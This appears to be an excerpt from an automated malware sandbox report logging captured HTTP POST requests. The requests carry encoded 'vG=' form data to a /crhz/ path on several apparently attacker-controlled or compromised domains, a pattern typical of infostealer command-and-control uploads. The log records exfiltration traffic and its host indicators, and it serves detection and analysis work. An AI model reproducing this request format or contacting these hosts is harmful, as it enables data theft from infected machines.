          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.teammart.onlineConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.teammart.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.teammart.online/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 31 62 53 71 44 46 52 35 4f 76 63 4e 37 58 64 4b 6f 67 6e 31 44 77 57 69 48 66 64 69 65 7a 6a 6a 78 2d 38 38 69 4c 31 66 78 58 62 36 46 58 68 41 69 4b 6d 57 4e 4f 43 48 63 57 5a 75 62 37 69 54 54 4b 55 70 7e 53 46 65 71 69 6c 72 79 57 59 38 56 61 70 32 52 50 44 57 63 33 44 7a 6c 68 65 35 48 34 70 79 71 79 62 35 69 64 52 35 78 56 7a 51 6e 36 52 6a 32 7a 68 31 6a 65 31 53 4a 67 4a 53 42 49 28 76 4a 6f 43 6e 47 67 6e 76 65 47 7a 4e 7e 71 4e 74 4d 65 5a 6a 47 66 73 4b 75 35 61 74 47 62 67 6c 28 58 79 31 64 42 6d 39 50 5f 30 73 7e 56 42 41 6d 73 34 4e 30 30 43 42 71 38 36 70 43 6b 34 4a 5a 77 6c 46 78 4b 38 6a 37 6b 38 7a 58 78 6d 55 72 35 7e 70 41 6a 35 50 6f 6d 6e 31 56 4c 79 32 5a 54 4e 59 63 33 73 33 35 6b 64 4d 58 31 47 57 57 50 62 34 45 62 42 46 79 58 68 52 66 59 48 67 62 70 6a 43 58 32 35 5f 53 42 43 39 70 50 77 4e 46 4f 53 6c 45 48 42 49 64 6d 72 4b 62 41 74 47 46 56 72 45 58 6d 74 47 51 6a 58 49 63 6c 50 57 43 76 6b 49 79 46 69 61 69 61 34 64 68 55 43 72 70 54 4b 56 5a 6e 75 78 43 76 5a 6d 34 70 79 58 62 7a 48 2d 53 65 55 59 71 6c 38 57 28 72 70 6d 4c 5f 6a 71 65 78 5a 74 41 50 67 66 75 52 63 30 79 55 49 58 66 78 31 6e 34 6f 4a 30 37 4e 6e 5a 6d 74 76 34 6e 4e 6b 6a 31 6b 75 34 70 68 4e 4e 43 66 33 69 73 69 30 55 4a 6d 77 5f 37 4c 6c 50 65 70 46 53 47 61 32 78 51 76 4c 6e 6e 67 58 55 31 41 77 68 5a 54 55 65 56 69 71 38 49 68 57 55 4b 74 37 30 4b 6b 4b 32 4a 66 61 46 38 42 79 56 38 78 77 5a 59 49 45 78 32 46 48 44 68 5a 68 45 47 57 4a 39 61 7a 69 63 67 34 70 41 67 6c 45 57 45 38 50 6f 6e 44 6c 65 74 33 7e 32 58 76 71 4f 78 37 69 6c 52 73 74 30 37 6a 6d 6b 4d 68 76 7a 79 4b 39 32 73 45 67 37 56 54 36 54 38 2d 5a 2d 65 47 6e 56 39 51 75 4c 73 6e 51 34 4c 6c 69 62 30 51 62 31 75 53 38 63 30 33 76 59 67 52 7a 70 56 73 47 73 72 39 6d 59 76 76 6b 36 52 30 78 31 67 33 6b 41 71 6b 49 66 31 6c 65 6e 4b 4a 65 48 31 52 77 32 6b 45 71 77 69 6d 65 5f 5a 52 35 68 44 44 56 33 72 38 77 63 71 71 51 66 6f 69 37 72 66 42 65 4c 31 71 76 70 42 51 7e 74 61 72 79 75 31 6b 5a 59 4d 52 4f 67 39 4d 36 52 49 45 78 4f 66 36 6d 57 76 70 69 74 31 74 30 48 56 38 77 39 45 4c 71 6a 44 6c 6f 56 32 4e 35 42 64 44 5a 39 5a 43 4b 68 6d 32 50 6e 7a 77 4e 54 4e 2d 34 4b 4c 43 73 2d 52 56 6e 6d 63 51 49 39 4b 56 32 44 36 44 35 35 4c 6b 6f 4a 6b 76 6e 43 77 68 73 79 65 32 30 43 36 48 50 63 62 55 6f 38 46 61 28 41 41 5f 4b 6f 55 52 33 37 56 75 4f 5a 4d 34 6a 66 65 70 6b 70 66 46 58 50 70 42 4e 74 46 4e 31 38 50 77 54 72 30 50 72 62 30 5f 79 46 75 77 5a 43 30 74 57 34 71 74 49 4a 4f 46 67 46 56 73 6c 79 56 4a 56 45 52 41 33 59 4f 37 59 53 52 6f 75 6b 56 57 43 6e 28 36 49 72 3
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.suachuadienlanh247.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.suachuadienlanh247.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.suachuadienlanh247.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 50 41 71 6b 64 53 34 39 69 76 63 39 4c 48 41 4b 35 73 76 63 4b 48 45 61 6e 47 71 45 39 71 49 43 6a 78 6b 72 46 52 67 2d 45 69 65 57 6b 61 6f 50 4a 54 6a 77 75 34 55 62 44 63 4b 5f 64 33 78 71 56 5f 53 39 6e 46 71 69 4a 35 67 76 32 45 41 38 44 78 55 36 5a 69 33 53 42 42 75 69 70 33 53 61 59 46 35 73 6d 68 6e 56 46 33 32 6a 77 73 41 57 4b 58 4d 44 32 4b 57 45 4b 64 61 59 58 5f 6f 37 6d 53 34 2d 4a 6a 74 34 6a 72 5a 55 55 57 61 57 66 2d 67 47 6f 68 28 70 77 67 6e 7a 34 4e 6d 4b 4d 6e 4a 67 53 36 4c 36 31 55 38 42 37 75 59 74 74 73 36 71 43 39 45 2e 00 00 00 00 00 00 00 00 Data Ascii: vG=PAqkdS49ivc9LHAK5svcKHEanGqE9qICjxkrFRg-EieWkaoPJTjwu4UbDcK_d3xqV_S9nFqiJ5gv2EA8DxU6Zi3SBBuip3SaYF5smhnVF32jwsAWKXMD2KWEKdaYX_o7mS4-Jjt4jrZUUWaWf-gGoh(pwgnz4NmKMnJgS6L61U8B7uYtts6qC9E.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.suachuadienlanh247.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.suachuadienlanh247.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.suachuadienlanh247.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 50 41 71 6b 64 53 34 39 69 76 63 39 4c 6d 77 4b 28 4c 54 63 44 48 45 56 73 6d 71 45 6d 36 49 65 6a 78 67 72 46 51 6b 75 45 77 79 57 6a 4a 51 50 49 78 4c 77 69 59 55 62 57 4d 4b 37 51 58 78 38 56 5f 76 47 6e 45 61 59 4a 36 4d 76 77 6e 34 38 46 30 49 37 53 79 33 51 46 42 75 6c 70 33 53 31 59 42 64 7a 6d 67 53 49 46 7a 61 6a 77 61 63 57 4e 6e 4d 41 7a 4b 57 45 4b 64 61 55 58 5f 6f 54 6d 57 55 6d 4a 6a 46 6f 6a 38 68 55 55 79 4f 57 64 64 59 46 68 42 7e 42 34 41 6d 33 31 73 50 64 47 57 73 5a 5a 4b 43 59 70 46 4d 57 77 4f 6b 6b 35 2d 37 68 62 34 75 5f 70 53 42 68 50 6d 75 73 50 44 71 5f 4a 4f 67 41 79 70 37 35 41 4f 59 7a 77 79 76 45 35 37 64 36 37 71 61 46 74 6d 6e 4d 67 58 32 49 62 43 54 2d 28 34 4e 76 39 53 47 56 41 67 68 35 35 53 6c 34 71 45 4e 6d 33 48 34 4c 77 49 5a 41 7e 63 4b 74 64 39 56 4f 31 6a 44 5a 79 33 7e 68 31 64 72 71 76 56 72 7a 34 41 59 2d 30 42 48 36 57 43 7e 5f 53 43 6b 39 6e 38 78 61 70 57 6b 58 33 79 62 6d 34 52 74 5f 5a 75 72 63 6a 4c 30 32 45 5a 43 67 70 6f 36 38 6a 6d 33 73 59 62 6f 35 69 6d 75 5f 48 78 67 4f 33 6b 67 4c 59 63 44 63 33 4c 30 59 54 6e 4a 57 38 38 46 31 38 4b 38 64 78 2d 4a 76 77 37 44 4c 4b 71 46 7a 37 56 58 62 58 66 7a 59 78 55 6b 47 57 55 46 71 46 68 6f 55 53 63 5a 46 64 64 54 72 36 46 77 37 65 31 37 5a 78 67 61 4a 72 48 4d 4c 77 32 30 69 4e 66 65 71 7a 50 65 54 4a 62 49 6e 31 69 70 46 56 6c 64 6e 7e 59 44 74 64 4c 6a 4c 32 30 6a 33 5a 4b 6b 6f 44 30 37 59 43 54 46 6a 4c 5a 54 70 61 33 78 43 32 69 56 59 54 5f 58 4c 41 39 55 59 7e 45 73 75 68 63 52 43 31 6f 76 57 6a 48 41 6a 31 62 55 75 49 33 54 77 69 31 76 65 48 50 45 7a 38 59 55 70 63 52 76 6b 57 6b 33 50 79 30 69 55 79 64 34 59 4a 39 50 6f 6c 54 77 32 41 4b 42 4a 28 6d 53 73 70 53 55 45 4d 64 45 30 30 69 47 37 59 67 4d 6f 32 65 4f 6b 63 6d 70 75 6d 4d 6e 32 38 6d 6d 51 68 2d 72 61 6f 34 6d 47 77 32 74 44 30 77 28 57 30 64 58 37 46 6e 5a 6e 37 7a 7a 61 77 69 48 36 47 74 79 36 4c 6f 58 70 35 6f 64 72 73 6f 45 52 62 75 53 4e 31 52 7e 4e 73 4a 71 45 50 66 34 54 37 6c 75 66 47 72 58 62 56 70 35 6c 63 4a 66 6e 4d 58 71 45 30 38 35 6c 35 76 28 68 42 6a 44 35 54 35 41 36 42 62 78 59 66 78 58 4b 64 5f 58 50 43 51 59 7a 4d 51 7a 76 4a 48 4c 76 53 41 6e 55 33 78 35 4b 4a 6a 4f 63 63 68 51 7a 57 72 46 4a 6c 55 4e 74 46 6e 31 52 41 37 48 4a 56 33 76 71 43 37 62 63 33 33 50 79 56 47 71 51 75 67 59 73 38 51 59 66 4d 77 7a 74 6f 66 77 77 43 6c 6f 63 69 34 6e 76 4e 56 34 33 51 78 72 71 70 50 53 71 38 77 68 75 34 37 31 72 59 67 58 5a 72 7a 74 37 64 52 44 63 4c 79 6b 76 5a 74 66 6d 72 47 65 7a 33 73 67 52 65 78 6a 56 30 64 4c 63 5a 4b 71 62 54 5
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.hvlandscapes.bizConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.hvlandscapes.bizUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hvlandscapes.biz/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 67 6b 6e 50 38 4e 70 51 78 33 54 51 33 63 67 4b 7a 71 7e 50 28 51 44 47 30 4c 52 70 30 39 62 47 50 53 65 47 31 50 71 6e 48 62 35 52 30 5a 48 74 75 78 48 36 55 46 36 76 51 76 64 76 63 6c 4b 5a 41 6a 4d 75 4b 76 6d 66 56 59 52 6b 47 41 49 43 37 70 33 6a 42 51 41 52 71 30 74 66 66 37 6d 65 6c 70 65 42 52 7a 7a 51 65 54 79 6c 43 6c 52 30 55 74 57 7a 6d 45 68 37 76 79 6f 42 36 6c 6e 43 65 30 53 41 79 37 76 79 6b 56 67 64 4b 5f 4a 67 78 58 43 58 44 49 6d 6e 79 75 67 48 4b 62 7e 62 28 2d 43 78 35 2d 33 35 34 63 32 44 76 39 41 4e 52 63 79 38 44 77 41 2e 00 00 00 00 00 00 00 00 Data Ascii: vG=gknP8NpQx3TQ3cgKzq~P(QDG0LRp09bGPSeG1PqnHb5R0ZHtuxH6UF6vQvdvclKZAjMuKvmfVYRkGAIC7p3jBQARq0tff7melpeBRzzQeTylClR0UtWzmEh7vyoB6lnCe0SAy7vykVgdK_JgxXCXDImnyugHKb~b(-Cx5-354c2Dv9ANRcy8DwA.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.hvlandscapes.bizConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.hvlandscapes.bizUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hvlandscapes.biz/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 67 6b 6e 50 38 4e 70 51 78 33 54 51 33 34 63 4b 67 5a 6d 50 35 77 44 46 6f 37 52 70 69 4e 62 38 50 53 53 47 31 4f 75 33 48 74 42 52 78 65 44 74 75 54 76 36 53 46 36 76 42 5f 64 72 52 46 4b 50 41 6a 5a 66 4b 75 36 6c 56 65 4a 6b 47 6a 67 43 77 4c 76 67 50 41 41 54 37 6b 74 63 66 37 6d 78 6c 6f 75 65 52 7a 32 4e 65 54 71 6c 43 58 35 30 41 4e 57 30 28 6b 68 37 76 79 6f 64 36 6c 6e 36 65 33 69 6d 79 2d 37 63 6b 6e 49 64 4c 65 46 67 79 30 61 55 58 34 6d 72 73 2d 68 44 4c 70 6e 30 6c 63 7e 38 33 62 6d 65 6d 75 53 6f 74 64 6f 43 49 50 32 47 59 77 48 65 78 49 38 44 43 57 33 6c 28 6a 45 6e 6e 36 75 4c 41 56 38 42 38 4b 41 35 66 7a 59 4e 69 5f 4f 76 54 5f 71 5f 77 55 67 32 41 37 55 73 7a 69 61 41 58 53 48 47 57 52 65 4c 6b 48 47 6c 49 6a 41 32 6b 31 53 4a 32 66 56 52 4d 54 64 30 4d 59 71 53 4f 37 54 75 39 41 57 30 47 77 42 39 28 37 42 58 71 37 49 32 58 36 44 6b 38 35 31 4d 4a 66 49 54 70 5f 62 4c 7a 2d 4f 44 66 51 41 4c 62 6b 6c 62 70 30 4c 32 6a 70 70 4c 4d 63 71 39 6c 52 6e 6e 62 6c 6e 41 43 70 28 78 34 48 62 38 28 4c 4e 4c 72 33 4f 35 51 45 36 59 4c 7a 66 34 47 5a 52 6a 4b 4e 59 2d 73 59 31 33 6f 7a 61 44 42 6e 71 31 33 38 61 34 37 49 4d 6c 6d 56 43 6a 38 71 7e 46 33 44 75 31 43 48 33 42 4c 58 67 51 6e 46 4a 37 37 5a 34 6b 4a 62 68 6f 51 6e 4b 45 4b 4a 34 6d 77 4c 28 54 4f 49 47 70 45 6e 74 79 75 4f 57 51 74 75 5a 35 6e 65 44 48 72 6e 4e 33 34 70 72 75 5a 72 47 61 66 35 6b 34 78 75 7a 77 55 38 6b 6e 64 34 75 70 70 6c 6f 66 31 71 6c 43 65 62 59 41 67 45 37 65 66 70 28 4c 6a 45 52 73 62 4d 7e 66 55 75 6f 67 6a 30 39 73 41 68 4e 44 34 46 6c 57 47 61 46 71 54 53 7e 72 47 33 34 6c 46 75 55 4e 76 50 30 39 71 61 32 43 4c 42 6a 67 62 55 53 4e 54 61 6d 65 68 4b 73 6e 51 4d 62 34 6e 74 59 66 49 51 65 59 51 35 38 7a 4d 34 49 47 63 30 75 6f 54 53 7e 2d 4a 39 6e 6c 45 46 78 4f 79 6c 58 70 32 74 7a 78 69 6f 73 58 71 48 79 49 4a 67 77 6b 35 55 49 38 71 6c 47 4e 5a 53 53 45 46 56 59 39 6f 56 41 62 33 46 55 6a 4a 39 6d 4f 31 48 59 63 68 37 65 47 36 57 52 79 66 5a 73 2d 28 4e 4d 69 56 73 73 78 68 78 51 2d 6e 49 6c 4a 55 71 71 52 6c 7a 61 44 62 34 67 57 31 34 6c 67 64 6c 44 73 51 4f 4a 42 65 53 59 6f 35 48 4d 4a 4b 41 76 4a 71 48 69 47 77 38 64 49 38 63 6e 42 64 59 51 55 67 4e 68 7a 4a 78 4d 47 6b 47 45 4f 65 34 4d 72 43 42 61 74 79 43 57 31 39 77 56 32 78 6a 34 2d 71 77 75 56 71 74 62 79 73 31 64 6a 6e 61 4d 75 63 53 6f 75 50 45 6c 4a 77 61 41 44 77 4b 35 79 45 67 6e 6c 56 62 4f 48 4f 6d 4c 36 71 66 28 45 6a 62 6f 78 39 35 44 58 66 2d 47 4c 6f 33 6f 62 30 37 67 55 4e 4b 73 57 64 55 39 62 64 65 30 49 74 72 69 45 4b 78 42 59 4c 35 65 56 36 68 71 71 34 70 4a 4
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.frogair.onlineConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.frogair.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frogair.online/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 76 77 30 6a 4e 31 43 6a 39 4c 34 4a 46 6a 35 70 30 64 58 39 36 37 6e 67 77 41 73 7a 7e 66 64 59 6f 67 4e 47 6e 43 46 48 54 49 4f 68 44 34 42 6d 4e 72 46 56 6f 74 4c 36 37 4d 53 34 64 30 32 76 53 66 6e 43 64 4c 36 68 67 6d 34 57 55 4d 63 31 53 67 6c 76 42 47 50 5f 4f 67 49 66 28 50 6b 4a 6c 46 4c 41 46 76 6a 30 6e 36 77 44 49 54 43 59 74 44 66 6f 4f 41 59 58 35 56 65 72 6b 51 76 36 33 64 43 63 62 32 43 51 71 67 6d 47 64 7a 54 71 6a 67 47 32 35 7a 4c 41 7a 32 56 35 63 45 39 34 6e 79 38 65 49 78 58 77 4c 5f 34 4d 72 4c 57 33 54 36 51 7a 6c 4e 41 2e 00 00 00 00 00 00 00 00 Data Ascii: vG=vw0jN1Cj9L4JFj5p0dX967ngwAsz~fdYogNGnCFHTIOhD4BmNrFVotL67MS4d02vSfnCdL6hgm4WUMc1SglvBGP_OgIf(PkJlFLAFvj0n6wDITCYtDfoOAYX5VerkQv63dCcb2CQqgmGdzTqjgG25zLAz2V5cE94ny8eIxXwL_4MrLW3T6QzlNA.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.frogair.onlineConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.frogair.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frogair.online/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 76 77 30 6a 4e 31 43 6a 39 4c 34 4a 46 44 70 70 6e 71 4c 39 74 72 6e 76 73 51 73 7a 6c 76 63 77 6f 67 4a 47 6e 48 39 58 54 2d 7e 68 47 5f 74 6d 4a 35 39 56 6c 4e 4c 36 39 4d 53 43 44 45 33 6b 53 66 6a 34 64 4a 69 78 67 6c 55 57 58 72 59 31 55 6a 4e 67 4f 57 50 39 5a 77 49 63 28 50 6b 51 6c 46 62 4d 46 76 6e 65 6e 36 6f 44 49 68 71 59 71 7a 66 72 43 67 59 58 35 56 65 6e 6b 51 75 72 33 64 61 45 62 79 6d 41 72 57 4b 47 64 53 66 71 69 47 4f 78 28 7a 4b 4a 35 57 56 6f 61 32 6f 51 6e 44 35 74 65 45 44 31 63 4d 51 75 6d 59 6e 73 41 76 4e 70 32 71 55 43 6c 64 59 37 6b 79 4e 54 39 73 34 4e 6a 75 57 4f 63 64 6d 71 4a 42 4c 43 45 79 53 71 28 76 4c 79 73 2d 69 34 49 78 36 45 4a 74 51 6d 4e 47 77 55 4c 46 71 5a 74 44 4b 71 51 68 65 75 47 67 66 63 49 39 51 6b 30 79 6b 72 52 37 52 51 43 4d 48 46 6e 44 34 30 4e 62 73 62 6c 6f 66 50 7e 63 51 35 38 50 6f 63 35 67 66 5a 7a 49 75 59 4a 46 4a 69 47 50 4b 38 34 51 4e 6b 28 39 6b 6f 53 5f 6c 41 7e 75 57 38 70 61 6a 31 75 48 67 41 54 30 39 50 49 4f 6a 55 71 62 6d 30 55 55 38 67 49 5a 45 5a 46 49 7a 78 4a 54 4d 37 44 41 77 52 54 45 5a 6c 56 4a 79 51 4d 6a 41 30 75 32 49 44 4e 66 31 63 51 73 79 52 47 6b 4d 6c 56 38 61 4e 73 5a 41 38 51 78 33 32 7e 30 28 42 47 4b 34 7a 49 30 41 48 53 71 7e 33 4c 68 7a 6c 52 57 64 55 39 71 58 50 55 7a 50 65 66 4e 50 53 38 6a 71 66 69 54 39 30 72 47 38 43 64 6f 52 59 6c 36 6f 61 63 37 53 54 52 69 57 51 6e 49 56 32 6d 5a 64 6e 66 4e 76 41 54 38 35 71 66 79 68 66 63 52 7a 75 46 6e 4f 31 4a 46 6d 30 74 70 51 50 70 52 57 6b 7e 38 64 76 47 61 75 4b 54 56 6e 7a 30 74 43 63 45 68 76 44 50 37 37 59 4a 7a 43 6b 63 4d 57 46 4f 51 39 44 4e 4c 4e 36 79 50 4d 79 55 61 44 46 6b 36 65 50 4c 66 38 65 4a 66 5a 6e 45 6d 74 59 49 4e 50 68 39 71 62 47 64 73 79 38 65 74 59 58 74 46 66 57 46 64 53 6f 4b 45 4e 67 35 68 32 69 4e 48 4f 77 34 6a 4a 70 45 53 53 73 39 36 35 52 6d 78 51 69 75 53 6a 73 56 30 73 68 31 74 33 44 5a 6f 33 56 58 43 4a 74 67 57 38 4c 73 4a 43 4e 30 71 70 4a 31 43 79 4d 6e 6b 63 55 6c 76 46 6a 6d 34 44 5a 63 2d 71 39 63 72 57 44 73 47 79 35 62 4e 61 45 49 79 4b 68 38 49 64 35 6d 36 50 42 41 39 69 65 62 54 45 42 68 2d 49 43 72 5f 39 6f 64 50 49 67 45 56 46 6b 7a 77 46 79 50 63 66 69 55 33 4c 33 5a 71 54 43 43 74 72 76 4c 51 59 2d 62 4b 28 69 79 4e 50 67 6d 67 77 4a 61 36 70 6e 6c 34 58 6d 51 46 6d 39 59 52 65 63 36 49 63 35 67 63 48 6b 76 70 75 46 6d 68 28 4f 4e 30 41 5a 50 64 6f 4a 33 74 34 69 75 69 4d 37 45 47 77 68 32 55 49 51 69 51 4c 44 39 4e 73 51 34 52 4d 4b 7e 58 61 72 48 6d 65 4d 31 35 6f 4f 62 33 4d 70 44 53 28 6f 54 2d 34 51 57 55 79 4d 61 35 39 68 46 64 57 56 68 63 58 71 56 4
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.mitsubangsaen.onlineConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.mitsubangsaen.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mitsubangsaen.online/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 71 6f 4f 35 43 64 43 61 35 49 73 4f 33 33 6d 64 59 63 42 6d 4b 44 4e 72 39 72 37 76 56 33 51 6e 4f 71 47 54 7a 6f 49 7a 48 68 54 77 55 6f 47 4c 37 69 33 44 4e 4a 45 76 59 4b 53 37 71 51 49 76 75 74 66 50 61 70 42 32 7e 55 4e 79 41 37 54 44 45 49 4a 4e 66 35 65 6c 6d 37 6e 32 6d 64 50 5a 50 2d 76 52 77 42 77 66 36 4f 6d 73 70 42 36 53 79 53 4f 32 28 66 69 6f 7a 65 58 37 32 41 75 65 30 35 56 53 7a 5f 56 63 66 44 52 59 4f 39 46 37 72 42 47 58 39 4a 31 55 7e 78 45 69 6e 62 46 32 6c 6b 42 34 30 6d 34 6c 39 39 6c 4a 6e 72 65 32 52 6d 30 5f 39 32 55 2e 00 00 00 00 00 00 00 00 Data Ascii: vG=qoO5CdCa5IsO33mdYcBmKDNr9r7vV3QnOqGTzoIzHhTwUoGL7i3DNJEvYKS7qQIvutfPapB2~UNyA7TDEIJNf5elm7n2mdPZP-vRwBwf6OmspB6SySO2(fiozeX72Aue05VSz_VcfDRYO9F7rBGX9J1U~xEinbF2lkB40m4l99lJnre2Rm0_92U.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.mitsubangsaen.onlineConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.mitsubangsaen.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mitsubangsaen.online/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 71 6f 4f 35 43 64 43 61 35 49 73 4f 32 55 7e 64 49 4c 56 6d 50 6a 4e 6f 79 4c 37 76 4f 6e 51 6a 4f 71 61 54 7a 70 38 64 48 53 28 77 55 35 57 4c 37 41 76 44 50 4a 45 76 51 71 53 33 6b 77 49 44 75 74 4c 44 61 74 45 42 7e 57 68 79 50 38 33 44 4d 75 39 4f 4b 5a 65 6e 78 72 6e 31 6d 64 50 32 50 39 48 64 77 42 38 35 36 49 4f 73 70 33 75 53 7a 69 4f 78 69 76 69 6f 7a 65 58 5f 32 41 76 50 30 35 64 61 7a 2d 64 4d 66 77 5a 59 4f 64 6c 37 34 6d 71 55 71 5a 31 59 30 52 46 76 72 72 6c 37 75 55 30 6e 32 48 55 54 74 39 39 68 6a 70 28 36 44 58 73 2d 6d 43 4b 55 48 71 71 45 77 55 6c 35 73 6a 73 5f 34 48 48 4b 42 35 46 51 77 71 36 76 30 57 55 4b 41 69 58 74 4f 6f 44 74 6c 6a 63 4f 57 51 74 77 71 37 5a 78 65 4f 49 7a 69 65 50 54 64 72 6c 34 4f 55 74 61 7e 69 6a 61 76 47 51 65 68 69 58 7a 30 55 51 58 35 6b 72 64 63 35 6d 2d 72 52 30 71 44 31 4b 36 7e 37 59 37 63 2d 52 32 51 67 32 46 72 4f 77 58 66 45 45 7a 30 63 4f 2d 52 38 44 2d 62 6e 70 43 71 6a 4e 4f 58 43 67 67 47 52 41 75 61 4c 72 4e 4a 31 37 76 54 4f 39 78 6e 2d 47 65 44 43 44 63 62 56 6c 34 31 67 6c 4e 75 43 4b 69 5a 6f 48 54 61 79 72 35 30 41 4e 42 52 72 56 51 42 2d 57 63 4a 50 75 37 56 4f 76 46 32 52 70 43 79 6e 56 65 57 72 4a 37 6d 6a 4f 70 4e 47 35 6b 39 78 4a 32 4e 5f 4c 36 4d 4e 4e 39 6e 39 61 38 58 4b 38 43 36 65 6e 51 31 4e 36 70 63 53 59 59 63 5a 35 67 44 39 77 75 34 75 67 4b 4d 48 7e 59 6b 35 70 4f 61 55 69 43 75 77 6a 77 51 46 58 62 7e 46 75 77 41 39 7a 49 47 4f 66 30 4b 55 6f 4c 5a 59 6c 6e 66 5f 47 49 44 75 6c 6e 32 6a 57 53 39 52 42 33 4b 6c 59 4b 66 70 75 31 64 58 43 37 4f 32 79 6f 36 67 46 67 5a 4e 78 4e 77 48 4e 72 4b 38 4d 52 47 74 4b 72 67 33 31 33 7e 65 50 6a 72 50 54 32 71 52 55 45 79 6e 75 6d 34 6a 61 74 4c 6e 47 47 54 4a 76 59 47 38 46 4c 52 6d 34 69 6b 6b 49 47 63 77 66 79 6d 64 32 5f 71 45 5a 39 77 36 51 31 48 66 77 57 64 58 61 31 4f 4f 6c 62 48 6c 38 6e 76 57 55 77 31 67 53 6f 43 63 35 41 64 33 37 4c 6f 6c 74 33 74 4f 79 54 53 69 34 70 56 4a 63 4d 68 79 45 32 33 39 62 37 64 6c 7e 6b 65 41 61 4f 75 5a 38 30 7a 79 56 53 6b 36 43 57 6b 6e 6c 79 76 6c 74 53 37 68 66 48 71 62 44 78 33 77 44 61 74 53 4a 54 31 72 6e 51 69 67 59 32 56 67 74 79 77 39 32 45 57 4d 50 75 79 4b 58 70 52 69 6d 76 45 59 48 6f 79 66 64 37 66 77 4e 61 66 39 68 56 6b 65 51 6d 59 34 6a 41 62 47 34 45 68 30 32 59 70 33 53 55 67 33 4c 73 61 51 35 62 4a 6e 50 56 4a 5a 79 6e 7e 37 47 6a 33 43 48 46 71 74 61 2d 66 6b 33 2d 67 52 6a 34 51 56 7a 36 61 39 4e 4a 49 37 6e 6f 38 4e 31 79 73 72 7a 77 61 2d 57 39 63 73 77 77 7e 30 5a 53 6c 34 37 37 32 4b 52 64 64 58 7e 53 59 4a 6d 4d 55 4f 37 65 7e 36 69 6
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.hayuterce.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.hayuterce.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hayuterce.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 6e 53 32 78 42 69 69 4a 34 50 6d 4b 28 4e 72 4d 75 52 74 2d 78 6a 4a 50 42 33 39 7a 6e 53 4f 43 56 75 55 2d 43 72 73 37 59 65 43 78 38 2d 70 43 30 4f 57 64 4e 38 76 70 5a 63 59 57 55 71 5a 5a 77 47 5a 6f 47 35 4b 6a 4c 64 71 67 6e 77 36 43 59 66 51 39 7a 43 39 57 6e 4d 7a 4d 35 4e 4a 70 34 76 72 30 55 34 5a 4b 37 57 37 5a 4d 70 46 76 6d 56 46 56 51 73 4c 66 6b 6a 57 7a 28 36 6b 6d 48 4c 54 4a 4f 57 6d 37 75 39 71 56 72 33 65 6c 6f 56 4d 62 7a 54 4a 71 54 77 42 55 73 38 46 7a 68 78 68 44 70 74 7a 61 71 30 4b 75 72 30 68 68 74 38 53 34 38 33 51 2e 00 00 00 00 00 00 00 00 Data Ascii: 